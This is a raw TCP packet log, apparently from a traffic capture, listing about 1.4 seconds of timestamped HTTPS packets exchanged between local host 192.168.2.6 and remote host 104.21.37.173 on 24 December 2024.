                                                                      Dec 24, 2024 08:29:23.507174015 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.507250071 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.507266045 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.507308006 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.527206898 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.527230024 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.527282953 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.527323961 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.527350903 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.527390957 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.537805080 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.537826061 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.537892103 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.537910938 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.538044930 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.589529037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.589551926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.589639902 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.589674950 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.589723110 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.675896883 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.675935030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.675978899 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.676012993 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.676040888 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.676064014 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.681548119 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.681566954 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.681648970 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.681668997 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.681798935 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.687813997 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.687839985 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.687887907 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.687911987 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.687939882 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.687963963 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.692949057 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.692969084 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.693025112 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.693051100 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.693069935 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.693797112 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.699131012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.699147940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.699209929 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.699234962 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.699294090 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.719844103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.719871044 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.719938993 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.719959974 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.719980001 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.720004082 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.729583979 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.729604959 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.729661942 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.729681015 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.729722977 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.729748011 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.786112070 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.786135912 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.786209106 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.786243916 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.786298990 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.868086100 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.868105888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.868160009 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.868192911 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.868216991 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.868240118 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.873395920 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.873416901 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.873497009 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.873516083 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.873572111 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.879611969 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.879640102 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.879678965 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.879698038 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.879723072 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.879751921 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.885742903 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.885775089 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.885802031 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.885818958 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.885848999 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.885864973 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.891021967 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.891041994 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.891123056 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.891151905 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.891201019 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.912185907 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.912204027 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.912275076 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.912305117 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.912359953 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.921798944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.921817064 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.921880960 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.921910048 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.921958923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.978293896 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.978315115 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.978384018 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:23.978415012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:23.978473902 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.060086012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.060106993 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.060174942 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.060197115 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.060239077 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.065721989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.065742970 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.065789938 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.065815926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.065840960 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.065857887 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.071671009 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.071688890 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.071757078 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.071777105 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.071837902 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.077790976 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.077809095 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.077889919 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.077919006 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.077966928 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.083297968 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.083338022 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.083379984 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.083401918 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.083419085 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.083444118 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.104406118 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.104429960 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.104495049 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.104523897 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.104613066 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.113667011 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.113688946 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.113761902 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.113789082 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.113806963 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.113884926 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.170289040 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.170317888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.170376062 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.170406103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.170427084 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.170448065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.252332926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.252367973 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.252439976 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.252474070 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.252494097 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.252533913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.258610964 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.258634090 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.258671999 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.258692980 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.258711100 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.258786917 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.264085054 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.264120102 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.264158964 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.264183998 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.264206886 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.264277935 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.269877911 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.269898891 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.269944906 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.269963026 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.269984961 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.270004988 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.275966883 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.275986910 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.276050091 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.276072025 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.276112080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.297132015 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.297166109 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.297241926 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.297275066 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.297295094 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.297348976 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.305919886 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.305953026 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.306010962 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.306030989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.306247950 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.306247950 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.362667084 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.362699032 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.362756968 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.362791061 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.362812996 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.362833977 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.445775032 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.445816040 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.445847988 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.445882082 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.445911884 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.445933104 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.451430082 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.451450109 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.451500893 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.451524019 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.451539040 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.451721907 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.457468033 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.457493067 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.457547903 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.457568884 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.457587957 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.457628012 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.463671923 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.463696003 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.463749886 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.463769913 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.463789940 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.463813066 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.469544888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.469573021 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.469643116 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.469666004 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.469683886 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.469708920 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.488406897 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.488435030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.488487959 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.488508940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.488533020 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.488548994 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.497761011 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.497781038 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.497848034 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.497869968 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.497883081 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.497925997 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.554673910 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.554697037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.554745913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.554768085 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.554785013 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.554807901 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.637965918 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.637988091 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.638036966 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.638061047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.638092995 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.638113022 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.643491030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.643512011 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.643552065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.643573999 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.643590927 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.643613100 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.649672031 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.649692059 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.649733067 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.649753094 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.649768114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.649791956 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.655863047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.655881882 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.655926943 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.655949116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.656308889 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.661256075 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.661276102 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.661315918 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.661329985 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.661356926 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.661381960 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.680969954 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.680990934 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.681035042 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.681056976 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.681072950 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.681090117 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.689769030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.689799070 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.689847946 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.689863920 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.689883947 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.689903021 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.746959925 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.746983051 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.747026920 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.747047901 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.747087955 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.747104883 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.830135107 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.830156088 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.830229998 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.830254078 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.830307007 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.835515976 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.835535049 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.835583925 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.835604906 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.835623026 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.835638046 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.841583014 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.841600895 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.841656923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.841677904 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.841691971 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.841712952 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.847798109 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.847820044 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.847881079 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.847902060 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.847979069 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.853183031 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.853205919 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.853244066 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.853265047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.853279114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.853298903 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.882705927 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.882725000 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.882778883 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.882807970 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.882827997 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.882846117 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.888894081 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.888911963 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.888967991 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:24.888989925 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:24.889112949 CET49719443192.168.2.6104.21.37.173
